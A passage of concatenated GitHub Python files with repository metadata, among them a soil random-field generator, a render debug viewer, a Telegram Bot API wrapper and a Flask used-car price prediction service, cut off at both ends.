layers.generate_mesh(np.array([X.ravel(), Y.ravel(), Z.ravel()]).T)\n\n theta = []\n aniso = []\n angles = []\n for i in range(nb_layers):\n theta.append([np.round(np.random.uniform(min_value, soils_dict[\"max_theta\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(min_value, soils_dict[\"max_theta\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(min_value, soils_dict[\"max_theta\"][idx_to_use_soil[i]]), 2),\n ])\n aniso.append([np.round(np.random.uniform(min_value, soils_dict[\"max_aniso\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(min_value, soils_dict[\"max_aniso\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(min_value, soils_dict[\"max_aniso\"][idx_to_use_soil[i]]), 2)\n ])\n angles.append([np.round(np.random.uniform(-soils_dict[\"max_angle\"][idx_to_use_soil[i]], soils_dict[\"max_angle\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(-soils_dict[\"max_angle\"][idx_to_use_soil[i]], soils_dict[\"max_angle\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(-soils_dict[\"max_angle\"][idx_to_use_soil[i]], soils_dict[\"max_angle\"][idx_to_use_soil[i]]), 2),\n ])\n\n rf = RandomFields(ModelName.Gaussian, layers.mesh.polygons_points, theta, aniso, angles, seed=n)\n rf.generate(np.array(soils_dict[\"soil_properties\"])[idx_to_use_soil], np.array(soils_dict[\"soil_var\"])[idx_to_use_soil])\n\n # plot3D(layers.mesh.polygons_points, rf.random_field, output_folder=\"./\", output_name=\"RF.png\")\n # plot3D_viewer(layers.mesh.polygons_points, rf.random_field, output_folder=\"./\", output_name=\"RF.html\")\n coord, sliced_rf = slice(layers.mesh.polygons_points, rf.random_field, 1, 0)\n\n with open(os.path.join(output_folder, f\"./slice_{str(n).zfill(3)}.txt\"), \"w\") as f:\n f.write(\"x;y;z;IC\\n\")\n for i in range(len(coord)):\n 
f.write(f\"{coord[i][0]};{coord[i][1]};{coord[i][2]};{sliced_rf[i]}\\n\")  # write all three coordinates so each row matches the x;y;z;IC header\n\n            # make plot\n            import matplotlib.pylab as plt\n            fig, ax = plt.subplots(1,1, figsize=(6, 4))\n            ax.set_position([0.1, 0.1, 0.7, 0.8])\n            im = ax.imshow(sliced_rf.reshape((resample_points_x, resample_points_z)),\n                           vmin=1., vmax=4., cmap=\"viridis\", extent=[0, x_max, 0, z_max])#, aspect=\"auto\")\n            cax = fig.add_axes([0.85, 0.45, 0.02, 0.1])\n            cbar = fig.colorbar(im, cax=cax, fraction=0.046, pad=0.04)\n            cbar.set_label(\"value\")\n            plt.savefig(os.path.join(output_folder, f\"slice_{str(n).zfill(3)}.png\"))\n            plt.close()\n        except Exception:\n            print(f\"Error in {n}\")\n            continue\n\n\nif __name__ == '__main__':\n\n    planes = {\"max_cov\": 0.1,\n              \"max_theta\": 10,\n              }\n    soils = {\"max_theta\": [10, 5, 10, 5, 10],\n             \"max_aniso\": [10, 5, 10, 5, 10],\n             \"max_angle\": [np.pi/6, np.pi/6, np.pi/6, np.pi/6, np.pi/6],\n             \"soil_properties\": [3, 2, 1.5, 4, 2.5],\n             \"soil_var\": [0.3, 0.2, 0.15, 0.4, 0.25],\n             }\n\n    x_max = 100\n    y_max = 5\n    z_max = 10\n    nb_max_layer = 5\n\n    min_layer_thickness = 0.1\n    output_folder = \"./output\"\n    generate_data(x_max, y_max, z_max, nb_max_layer, min_layer_thickness,\n                  planes, soils, output_folder, 10)\n\n    split_data(output_folder, os.path.join(output_folder, \"train\"), os.path.join(output_folder, \"./validation\"),\n               train_size=0.8)\n","repo_name":"brunozc/RandomLayers","sub_path":"generator_RF.py","file_name":"generator_RF.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21401327359","text":"#!/usr/bin/env python3\nimport collections\nimport functools\nimport json\nimport logging\nimport pathlib\nfrom typing import Union\n\nimport cv2\nimport fire\nimport numpy as np\nfrom blenderset.utils.log import configure_logging\nfrom skimage import util\nfrom vi3o import debugview\nfrom vi3o.image import imread\n\nfrom blenderset.utils.lens import create_lens_from_json\n\nlogger = logging.getLogger(__name__)\n\n\nclass DebugViewer(debugview.DebugViewer):\n    def __init__(self, paths, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self._paths = collections.deque(paths)\n        self._view = \"rgb\"\n        self._render()\n\n    def _render(self):\n        path = self._paths[0]\n        logger.info(\"Showing %s for %s\", self._view, path)\n        if self._view == \"rgb\":\n            self.view(_read_rgb_with_overlay(path), pause=True)\n        elif self._view == \"seg\":\n            self.view(_read_seg(path), pause=True)\n        elif self._view == \"hmask\":\n            self.view(_read_hmask(path), pause=True)\n        else:\n            assert False\n\n    def on_key_press(self, key, modifiers):\n        if key == debugview.keysym.N:\n            self._paths.rotate(-1)\n        elif key == debugview.keysym.P:\n            self._paths.rotate(1)\n        elif key == debugview.keysym.R:\n            self._view = \"rgb\"\n        elif key == debugview.keysym.S:\n            self._view = \"seg\"\n        elif key == debugview.keysym.H:\n            self._view = \"hmask\"\n        else:\n            super().on_key_press(key, modifiers)\n        self._render()\n\n\n@functools.lru_cache(maxsize=2)\ndef _read_seg(path: pathlib.Path):\n    return util.img_as_ubyte(np.load(path / \"segmentations.npy\"))\n\n\n@functools.lru_cache(maxsize=2)\ndef _read_hmask(path: pathlib.Path):\n    return imread(path / \"head_mask.png\")\n\n\n
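# The _read_* helpers in this viewer are wrapped in functools.lru_cache so flipping
# between views of the same frame does not re-read files from disk. A minimal,
# self-contained illustration of that memoisation (toy function, not part of
# show_render.py):
import functools

@functools.lru_cache(maxsize=2)
def load(path: str) -> str:
    print("loading", path)  # runs only on a cache miss
    return path.upper()

load("rgb.png")  # prints "loading rgb.png"
load("rgb.png")  # served from the cache, nothing printed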
@functools.lru_cache(maxsize=2)\ndef _read_rgb_with_overlay(path: pathlib.Path):\n    img = imread(path / \"rgb.png\")\n    objects = json.load(open(path / \"objects.json\"))\n\n    lens = create_lens_from_json(img.shape, path / \"lens.json\")\n    camera_matrix = np.load(path / \"camera_matrix.npy\")\n\n    for obj in objects.values():\n        for key in [\"bounding_box_tighter\", \"bounding_box_tight\"]:\n            if key in obj:\n                bbox = obj[key]\n                break\n        else:\n            assert False\n        u0, u1, v0, v1 = bbox\n        if obj[\"class\"] == \"human\":\n            cv2.rectangle(img, (u0, v0), (u1, v1), (255, 0, 0), 1)\n            try:\n                u2, u3, v2, v3 = obj[\"bounding_box_head\"]\n                cv2.rectangle(img, (u2, v2), (u3, v3), (0, 255, 255), 1)\n            except KeyError:\n                pass\n        elif obj[\"class\"] == \"construction_hat\":\n            cv2.rectangle(img, (u0, v0), (u1, v1), (255, 255, 51), 1)\n        elif obj[\"class\"] == \"vehicle\":\n            cv2.rectangle(img, (u0, v0), (u1, v1), (0, 255, 0), 1)\n        else:\n            cv2.rectangle(img, (u0, v0), (u1, v1), (0, 0, 255), 1)\n\n        if \"head_center_img\" in obj[\"keypoints\"]:\n            u0, v0 = obj[\"keypoints\"][\"head_center_img\"]\n            u1, v1 = obj[\"keypoints\"][\"left_foot_img\"]\n            u2, v2 = obj[\"keypoints\"][\"right_foot_img\"]\n            u = (u0 + u1 / 2 + u2 / 2) / 2\n            v = (v0 + v1 / 2 + v2 / 2) / 2\n            cv2.line(img, (int(u), int(v)), (int(u0), int(v0)), (0, 255, 0), 1)\n            cv2.line(img, (int(u), int(v)), (int(u1), int(v1)), (0, 255, 0), 1)\n            cv2.line(img, (int(u), int(v)), (int(u2), int(v2)), (0, 255, 0), 1)\n\n            for n in [\"head_center\", \"left_foot\", \"right_foot\"]:\n                x, y, z = obj[\"keypoints\"][n]\n                x, y, z, _ = camera_matrix @ (x, y, z, 1)\n                u, v = lens.world_to_image([x, y, z])[0]\n                cv2.circle(img, (int(u), int(v)), 4, (0, 0, 255), 1)\n    return img\n\n\ndef show_many(*paths: Union[str, pathlib.Path]):\n    DebugViewer([pathlib.Path(path) for path in paths])\n\n\nif __name__ == \"__main__\":\n    configure_logging()\n    fire.Fire(show_many)\n","repo_name":"AxisCommunications/blenderset-addon","sub_path":"show_render.py","file_name":"show_render.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"24161105952","text":"class Solution:\n    def partitionLabels(self, S: str):\n        start=0\n        end=len(S)-1\n        res=[]\n        cur=0\n        cache={}  # stores the rightmost position of each character in the string\n        max_len=0\n        while cur<len(S):\n            if cur>max_len:\n                res.append(max_len-start+1)\n                start=cur\n                max_len=cur\n            while S[cur] not in cache and end>=max(max_len,cur):\n                if S[end] not in cache:\n                    cache[S[end]]=end\n                end-=1\n            if S[cur] in cache:\n                max_len=max(max_len,cache[S[cur]])\n            cur+=1\n        res.append(len(S)-start)\n        return res\nS=\"ababcbacadefegdehijhklij\"\nprint(Solution().partitionLabels(S))","repo_name":"LChanger/LeetCode","sub_path":"LeetCode/LeetCode763.py","file_name":"LeetCode763.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4797377675","text":"import cjson\n\nTABA_EVENT_IDX_NAME = 0\nTABA_EVENT_IDX_TYPE = 1\nTABA_EVENT_IDX_VALUE = 2\nTABA_EVENT_IDX_TIME = 3\n\nclass TabaEvent(object):\n  \"\"\"Simple container for Taba Events\"\"\"\n  def __init__(self, name, type, value, timestamp):\n    self.name = name\n    self.type = type\n    self.value = value\n    self.timestamp = timestamp\n\ndef SerializeEvent(event):\n  \"\"\"Convert a Taba Event object into a representation that can be serialized\n\n  Args:\n    event - A TabaEvent object.\n\n  Returns:\n    A tuple of (name, type, val, timestamp) for the Event.\n  \"\"\"\n  return (event.name, event.type, cjson.encode(event.value), event.timestamp)\n\ndef DeserializeEvent(val):\n  \"\"\"Convert the output of SerializeEvent() back into a TabaEvent object.\n\n  Args:\n    val - A tuple of (name, type, val, timestamp) for an Event.\n\n  Returns:\n    A corresponding TabaEvent object.\n  \"\"\"\n  return TabaEvent(val[0], val[1], cjson.decode(val[2]), 
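# Round-trip sketch for the SerializeEvent/DeserializeEvent helpers here, with the
# standard-library json module standing in for the legacy cjson dependency (an
# assumption: cjson.encode/decode behave like json.dumps/loads for these values).
import json

class Event:  # minimal stand-in for TabaEvent
    def __init__(self, name, type, value, timestamp):
        self.name, self.type, self.value, self.timestamp = name, type, value, timestamp

def serialize(event):
    return (event.name, event.type, json.dumps(event.value), event.timestamp)

def deserialize(val):
    return Event(val[0], val[1], json.loads(val[2]), val[3])

evt = deserialize(serialize(Event("hits", "counter", {"n": 1}, 1700000000)))
assert evt.value == {"n": 1}  # the value survives the encode/decode round trip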
val[3])\n\n","repo_name":"pragnesh/taba","sub_path":"py/tellapart/taba/taba_event.py","file_name":"taba_event.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"34173969105","text":"from Tkinter import *\n#from Tkinter.ttk import *\n#root = Tk()\n#text = Label(root, text = \"Tk's job!!\",\n#\t\t\twidth =\"80\", height=\"50\",\n#\t\t\tbg = \"black\", fg = \"white\")\n\n#text.pack()\n#root.mainloop()\n\nclass EncryptGUI(Frame):\n\tdef __init__(self, master=None):\n\t\tFrame.__init__(self, master)\n\t\tself.grid()\n\t\tself.createWidgets()\n\n\tdef createWidgets(self):\n\t\tself.it=Label(self)\n\t\tself.it[\"text\"] = \"Input: \"\n\t\tself.it.grid(row=0, column=0)\n\t\tself.ifd = Entry(self)\n\t\tself.ifd[\"width\"]=60\n\t\tself.ifd.grid(row=0, column=1, columnspan=6)\n\n\t\tself.ot=Label(self)\n\t\tself.ot[\"text\"] = \"Output: \"\n\t\tself.ot.grid(row=1, column=0)\n\t\tself.ofd = Entry(self)\n\t\tself.ofd[\"width\"]=60\n\t\tself.ofd.grid(row=1, column=1, columnspan=6)\n\n\t\tself.nb = Button(self)\n\t\tself.nb[\"text\"] = \"New\"\n\t\tself.nb.grid(row=2, column=0)\n\t\tself.nb[\"command\"]=self.nm\n\n\t\tself.lb = Button(self)\n\t\tself.lb[\"text\"] =\"Load\"\n\t\tself.lb.grid(row=2, column=1)\n\t\tself.lb[\"command\"]=self.lm\n\n\t\tself.sb = Button(self)\n\t\tself.sb[\"text\"] = \"Save\"\n\t\tself.sb.grid(row=2, column=2)\n\t\tself.sb[\"command\"]=self.sm\n\n\t\tself.eb = Button(self)\n\t\tself.eb[\"text\"] = \"Encode\"\n\t\tself.eb.grid(row=2, column=3)\n\t\tself.eb[\"command\"]=self.em\n\n\t\tself.db = Button(self)\n\t\tself.db[\"text\"]= \"Decode\"\n\t\tself.db.grid(row=2, column=4)\n\t\tself.db[\"command\"]=self.dm\n\n\t\tself.cb = Button(self)\n\t\tself.cb[\"text\"]=\"Clear\"\n\t\tself.cb.grid(row=2, column=5)\n\t\tself.cb[\"command\"]=self.cm\n\n\t\tself.cb2 = Button(self)\n\t\tself.cb2[\"text\"]=\"Copy\"\n\t\tself.cb2.grid(row=2, column=6)\n\t\tself.cb2[\"command\"]=self.cm2\n\n\t\tself.dt=Label(self)\n\t\tm=\"something happend\"\n\t\tself.dt[\"text\"]=m\n\t\tself.dt.grid(row=3, column=0, columnspan=7)\n\n\tdef nm(self):\n\t\ta=int(self.ifd.get())+int(self.ofd.get())\n\t\tself.dt[\"text\"]=a\n\n\tdef lm(self):\n\t\tself.dt[\"text\"]=\"Load Button\"\n\n\tdef sm(self):\n\t\tself.dt[\"text\"]=\"Save Button\"\n\n\tdef em(self):\n\t\tself.dt[\"text\"]=\"Encode Button\"\n\n\tdef dm(self):\n\t\tself.dt[\"text\"]=\"Decode Button\"\n\n\tdef cm(self):\n\t\tself.dt[\"text\"]=\"Clear Button\"\n\n\tdef cm2(self):\n\t\tself.dt[\"text\"]=\"Copy Button\"\n\nif __name__ == \"__main__\":\n\troot = Tk()\n\tapp = EncryptGUI(master=root)\n\tapp.mainloop()","repo_name":"qu6d83fu/Python","sub_path":"test/tk.py","file_name":"tk.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39263325431","text":"import io\nimport sys\nimport csv\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding='utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding='utf-8')\n\ncities = []\nwith open(\"./cities.csv\", encoding=\"utf-8\") as f:\n csv_reader = csv.reader(f, delimiter=',')\n for row in csv_reader:\n cities.append(row[1])\n\n\ncities = [x.strip() for x in cities]\n\nresult = []\n\nprint (\"started\", flush=True)\ni = 0\n\ncities = list(set(cities))\ncities.sort()\n\nwith open(\"cities_list.txt\", \"a\", encoding=\"utf-8\") as f:\n for city in cities:\n\n print(city + \" is valid \\n\", flush=True)\n 
f.write(city + \"\\n\")\n\n\n\n\n\n","repo_name":"Jadro007/EventParser","sub_path":"data/parse_cities_to_list.py","file_name":"parse_cities_to_list.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35696780793","text":"\"\"\"\nExample of point NSRP modelling based on the Brize Norton hourly gauge record.\n\nScript version of nsrp_example.ipynb notebook.\n\n\"\"\"\nimport rwgen\n\n# Boilerplate line needed to use multiprocessing in fitting on Windows OS\nif __name__ == '__main__':\n\n    # Initialise model\n    rainfall_model = rwgen.RainfallModel(\n        spatial_model=False,\n        project_name='brize_norton',\n        input_timeseries='./input/brize_norton.csv',\n        statistic_definitions='./input/statistic_definitions.csv',\n        intensity_distribution='weibull',\n    )\n\n    # Calculate observed/reference statistics from gauge time series file\n    rainfall_model.preprocess()\n\n    # Fit model and save parameters to file\n    rainfall_model.fit(\n        n_workers=8,  # e.g. for computer with 8 cores or logical processors\n        pdry_iterations=0,\n    )\n\n    # Simulate three realisations of 1000 years with a 1hr timestep\n    rainfall_model.simulate(\n        simulation_length=1000,\n        n_realisations=3,\n        timestep_length=1\n    )\n\n    # Postprocessing\n    rainfall_model.postprocess(\n        amax_durations=[1, 6, 24],  # durations in hours\n        ddf_return_periods=[20, 50, 100],  # return periods in years\n    )\n    \n    # Plotting annual cycles (in browser)\n    rainfall_model.plot()\n","repo_name":"davidpritchard1/rwgen","sub_path":"examples/rainfall_model/single_site/nsrp_example.py","file_name":"nsrp_example.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34687003322","text":"import requests\nfrom urllib.parse import urlencode\nimport json\n\n\nclass TelegramBotApi(object):\n    \"\"\"Minimal wrapper around the Telegram Bot HTTP API.\"\"\"\n\n    api_url = 'https://api.telegram.org/bot'\n\n    def __init__(self, token):\n        self.token = token\n\n    def get_updates(self, params: dict = None) -> dict:\n        params = urlencode(params) if params else ''  # urlencode(None) would raise TypeError\n        res = requests.get(f'{self.api_url}{self.token}/getUpdates?{params}', timeout=10)\n        return res.json()\n\n    def send_message(self, chat_id: int, message: str, params: dict = None) -> dict:\n        if not message:\n            return\n        params = params or {}\n        params.update({'chat_id': chat_id, 'text': message, 'parse_mode': 'Markdown'})\n        res = requests.post(f'{self.api_url}{self.token}/sendMessage', data=params, timeout=10)\n        return res.json()\n\n    def edit_message(self, chat_id: int, message: str, params: dict = None) -> dict:\n        if not message:\n            return\n        params = params or {}\n        params.update({'chat_id': chat_id, 'text': message, 'parse_mode': 'Markdown'})\n        res = requests.post(f'{self.api_url}{self.token}/editMessageText', data=params, timeout=10)\n        return res.json()\n\n    def get_chat(self, chat_id: int) -> dict:\n        params = {'chat_id': chat_id}\n        res = requests.post(f'{self.api_url}{self.token}/getChat', data=params, timeout=10)\n        return res.json()\n\n    def send_photo(self, chat_id: int, url: str, params: dict = None) -> dict:\n        params = params or {}\n        params.update({\n            'photo': url,\n            'chat_id': chat_id,\n            'caption': params.get('caption', ''),\n            'parse_mode': 'Markdown'\n        })\n        res = requests.post(f'{self.api_url}{self.token}/sendPhoto', data=params, timeout=10)\n        return res.json()\n\n    def answer_callback_query(self, callback_query_id, message: str, params: dict = None):\n        if not message:\n            return\n        
params = params or {}\n params.update({'callback_query_id': callback_query_id, 'text': message})\n res = requests.post(f'{self.api_url}{self.token}/answerCallbackQuery', data=params, timeout=10)\n return res.json()\n\n def sendMediaGroup(self, chat_id: int, media: list = [], params: dict = None):\n params = params or {}\n params.update({'media': json.dumps(media), 'chat_id': chat_id})\n res = requests.post(f'{self.api_url}{self.token}/sendMediaGroup', data=params, timeout=30)\n return res.json()\n","repo_name":"lundgrenalex/towngamerbot","sub_path":"src/drivers/telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"8767621304","text":"import sqlite3 #sqLite için yapılmış kütüphane. SABİTTİR.\r\n\r\ndef listele(): #Listele fonksiyonunu oluşturduk.\r\n baglanti = sqlite3.connect(\"chinook.db\") #sqlite'taki chinook veritabanına bağlandık.\r\n cursor = baglanti.execute(\"select FirstName,LastName from customers\") #ilgili bağlantıyı çalıştır.\r\n # sutun[1] ,sutun[2]\r\n for sutun in cursor:\r\n print(sutun[0], sutun[1])\r\n# FisrtName,LastName\r\n baglanti.close()\r\n\r\nlistele()","repo_name":"oguzhannw/Canl---6-Saatlik-PYTHON-Programlama-Kamp-Dersleri","sub_path":"sqliteDemo.py","file_name":"sqliteDemo.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21467248445","text":"def main():\n for counter1 in range(1000, 2001, 5):\n # Values / Process\n counter1 = counter1\n counter2 = counter1 + 1\n counter3 = counter2 + 1\n counter4 = counter3 + 1\n counter5 = counter4 + 1\n\n print(counter1, end=\" \")\n\n if counter1 < 2000:\n print(counter2, end=\" \")\n print(counter3, end=\" \")\n print(counter4, end=\" \")\n print(counter5, end=\" \")\n print(\"\")\n if counter1 == 2000:\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ICS3U-Programming-Jedidiah-B/Unit4-07-Python","sub_path":"Five_int.py","file_name":"Five_int.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3824974912","text":"#!/usr/bin/env python\n\nimport sys\nfrom os.path import join, dirname\nfrom setuptools import setup\n\nsys.path.append(join(dirname(__file__), 'src'))\n\nexecfile(join(dirname(__file__), 'src', 'BrowserMobProxyLibrary', 'version.py'))\n\nDESCRIPTION = \"\"\"\nBrowserMobProxyLibrary is a Robot Framework library ro interface with BrowserMob Proxy.\nBrowserMob Proxy is a simple utility to capture performance data for web apps (via the HAR format),\nas well as manipulate browser behavior and traffic, such as whitelisting and blacklisting content,\nsimulating network traffic and latency, and rewriting HTTP requests and responses.\n\"\"\"\n\nsetup(name = 'robotframework-browsermobproxylibrary',\n version = VERSION,\n description = 'BrowserMob Proxy library for Robot Framework',\n long_description = DESCRIPTION,\n author = 'Marcin Mierzejewski',\n author_email = '',\n url = 'https://github.com/s4int/robotframework-BrowserMobProxyLibrary',\n license = 'Apache License 2.0',\n keywords = 'robotframework testing selenium selenium2 webdriver web browsermob proxy',\n platforms = 'any',\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n \"Programming 
Language :: Python\",\n \"Topic :: Software Development :: Testing\"\n ],\n install_requires = [\n 'robotframework >= 2.6.0',\n 'browsermob-proxy >= 0.7.1',\n ],\n package_dir = {'': 'src'},\n packages = ['BrowserMobProxyLibrary'],\n )\n","repo_name":"badjiyoon/seleniumtest","sub_path":"robotframework-BrowserMobProxy/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32539519791","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import svm, neighbors, linear_model, naive_bayes\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error, r2_score, accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.datasets import load_iris, load_wine, load_boston\n\n\n\nfeatures, labels = load_wine(return_X_y=True)\nX_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.3, random_state=42)\n\nmodel_nb = make_pipeline(PCA(n_components=4), GaussianNB())\nmodel_nb.fit(X_train, y_train)\nprediction = model_nb.predict(X_test)\n\nmodel_nb_scale = make_pipeline(StandardScaler(), PCA(n_components=4), GaussianNB())\nmodel_nb_scale.fit(X_train, y_train)\nprediction_scaled = model_nb_scale.predict(X_test)\n\nprint(len(features[0]))\n\naccuracy = accuracy_score(prediction, y_test)\nprint('accuracy of model_nb:', accuracy)\n\n\naccuracy = accuracy_score(prediction_scaled, y_test)\nprint('accuracy of model_nb_scaled:', accuracy)\n\npca = model_nb_scale.named_steps['pca']\nscaler = model_nb_scale.named_steps['standardscaler']\n\n\n#x_transformed = model_nb_scale.transform(scaler.transform(train_x))\nX_train_std = pca.transform(scaler.transform(X_train))\n\nFIG_SIZE = (10,10)\n#fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=FIG_SIZE)\nfig = plt.figure(\"test\", figsize=FIG_SIZE)\n#(ax1,ax2) = Axes3D(fig, elev=45, azim=130)\n#ax = fig.(1,1, projection='3d')\nax1 = fig.add_subplot(121, projection='3d')\nax2 = fig.add_subplot(122, projection='3d')\n\nfor l, c, m in zip(range(0, 3), ('blue', 'red', 'green'), ('^', 's', 'o')):\n x = X_train[y_train == l, 0]\n y = X_train[y_train == l, 1]\n z = X_train[y_train == l, 2]\n ax1.scatter(x, y, z, color=c, marker=m, alpha=0.5)\n\nfor l, c, m in zip(range(0, 3), ('blue', 'red', 'green'), ('^', 's', 'o')):\n x = X_train_std[y_train == l, 0]\n y = X_train_std[y_train == l, 1]\n z = X_train_std[y_train == l, 2]\n ax2.scatter(x, y, z, color=c, marker=m, alpha=0.5)\n\nax1.set_title(\"Training set after PCA\")\nax2.set_title(\"Training set after PCA with standardizer\")\n\nfor a in (ax1, ax2):\n a.set_xlabel('pca component 1')\n a.set_ylabel('pca component 2')\n a.set_zlabel('pca component 3')\n a.grid()\n\nplt.show()\n","repo_name":"ssalgadoe/ML_SCIKIT_Neural_NETs","sub_path":"standardizer_effect_3d.py","file_name":"standardizer_effect_3d.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72944561530","text":"\"\"\"Prediction module\"\"\"\n\nimport os\nimport pickle\n\nimport mlflow\nimport pandas as pd\nimport requests\nfrom flask import Flask, flash, jsonify, request, render_template\nfrom pymongo import MongoClient\n\nEXPERIMENT_NAME = 
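# Why the standardised pipeline in standardizer_effect_3d.py above tends to score
# higher: without scaling, the leading PCA components are dominated by whichever
# wine feature has the largest raw variance, so most features barely contribute.
# A small synthetic demonstration of that effect:
import numpy as np
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(0)
X = np.column_stack([rng.normal(0, 1000, 200), rng.normal(0, 1, 200)])
print(PCA(n_components=2).fit(X).explained_variance_ratio_)
# ~[1.0, 0.0]: the high-variance column swallows the first component
X_std = StandardScaler().fit_transform(X)
print(PCA(n_components=2).fit(X_std).explained_variance_ratio_)
# ~[0.5, 0.5]: after standardisation both directions matter equally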
os.getenv(\"EXPERIMENT_NAME\", \"used-car-prediction\")\nMLFLOW_ENABLED = os.getenv(\"MLFLOW_ENABLED\", \"False\") == \"True\"\nMLFLOW_TRACKING_URI = os.getenv(\"MLFLOW_TRACKING_URI\", \"http://localhost:5000\")\nDEFAULT_MODEL_ENABLED = os.getenv(\"DEFAULT_MODEL_ENABLED\", \"True\") == \"True\"\nMONITORING_ENABLED = os.getenv(\"MONITORING_ENABLED\", \"False\") == \"True\"\nEVIDENTLY_SERVICE_URI = os.getenv(\"EVIDENTLY_SERVICE_URI\", \"http://localhost:8085\")\nMONGODB_URI = os.getenv(\"MONGODB_URI\", \"mongodb://localhost:27017\")\nif not os.getenv(\"MLFLOW_S3_ENDPOINT_URL\"):\n    os.environ[\"MLFLOW_S3_ENDPOINT_URL\"] = \"http://localhost:9000\"\n\nif MONITORING_ENABLED:\n    mongo_client = MongoClient(MONGODB_URI)\n    db = mongo_client.get_database(\"prediction_service\")\n    collection = db.get_collection(EXPERIMENT_NAME)\n\n\ndef load_model_from_registry():\n    \"\"\"\n    Loads the ML model from the MLflow registry\n    \"\"\"\n    mlflow.set_tracking_uri(MLFLOW_TRACKING_URI)\n    model_uri = f\"models:/{EXPERIMENT_NAME}/latest\"\n    loaded_model = mlflow.pyfunc.load_model(model_uri)\n    print(\"Loaded model from S3 bucket\")\n    return loaded_model\n\n\ndef load_default_model():\n    \"\"\"\n    Loads the default ML model from disk\n    \"\"\"\n    with open(\"pickle/model.pkl\", \"rb\") as f_in:\n        loaded_model = pickle.load(f_in)\n    print(\"Loaded default model from disk\")\n    return loaded_model\n\n\ndef load_model():\n    \"\"\"\n    Loads the ML model, falling back to the default model on registry errors\n    \"\"\"\n    try:\n        if MLFLOW_ENABLED:\n            return load_model_from_registry()\n\n        if DEFAULT_MODEL_ENABLED:\n            return load_default_model()\n    except Exception:\n        if DEFAULT_MODEL_ENABLED:\n            return load_default_model()\n\n    return None\n\ndef validate_data(record):\n    \"\"\"\n    Performs data validation\n    \"\"\"\n    if record[\"vehicle_age\"] < 0 or record[\"vehicle_age\"] > 30:\n        return \"Vehicle_age should be between 0 and 30 years\"\n    \n    if record[\"mileage\"] < 4.0 or record[\"mileage\"] > 33.0:\n        return \"Mileage should be between 4.0 and 33.0\"\n    \n    if record[\"max_power\"] < 38.0 or record[\"max_power\"] > 626.0:\n        return \"Max power should be between 38.0 and 626.0\"\n    \n    if record[\"seats\"] < 1 or record[\"seats\"] > 9:\n        return \"Seats should be between 1 and 9\"\n    \n    return None\n\ndef predict(model, df):\n    \"\"\"\n    Predicts the car market value\n    \"\"\"\n    prediction = model.predict(df)\n    return prediction[0]\n\n\ndef save_to_db(record, selling_price):\n    \"\"\"\n    Saves the prediction data to the Mongo database\n    \"\"\"\n    rec = record.copy()\n    rec[\"selling_price\"] = selling_price\n    collection.insert_one(rec)\n\n\n# def send_to_evidently_service(record, selling_price):\n#     \"\"\"\n#     Sends the prediction data to the Evidently monitoring service\n#     \"\"\"\n#     rec = record.copy()\n#     rec[\"selling_price\"] = selling_price\n#     requests.post(f\"{EVIDENTLY_SERVICE_URI}/iterate/---\", json=[rec])\n\n\ndef calculate_selling_price(record):\n    \"\"\"\n    Calculates the car's selling price from a raw feature record\n    \"\"\"\n    input_data = transform_data(record)\n    selling_price = predict(model, input_data)\n    if MONITORING_ENABLED:\n        save_to_db(record, selling_price)\n        # send_to_evidently_service(record, selling_price)  # disabled: the service helper above is commented out\n    return selling_price\n\ndef load_list():\n    \"\"\"\n    Get model and brand list from a pickle file\n    \"\"\"\n    file = open(\"pickle/carnamelist.pkl\", 'rb')\n    model_list = pickle.load(file)\n    brand_list = pickle.load(file)\n    file.close()\n    return model_list, brand_list\n\ndef 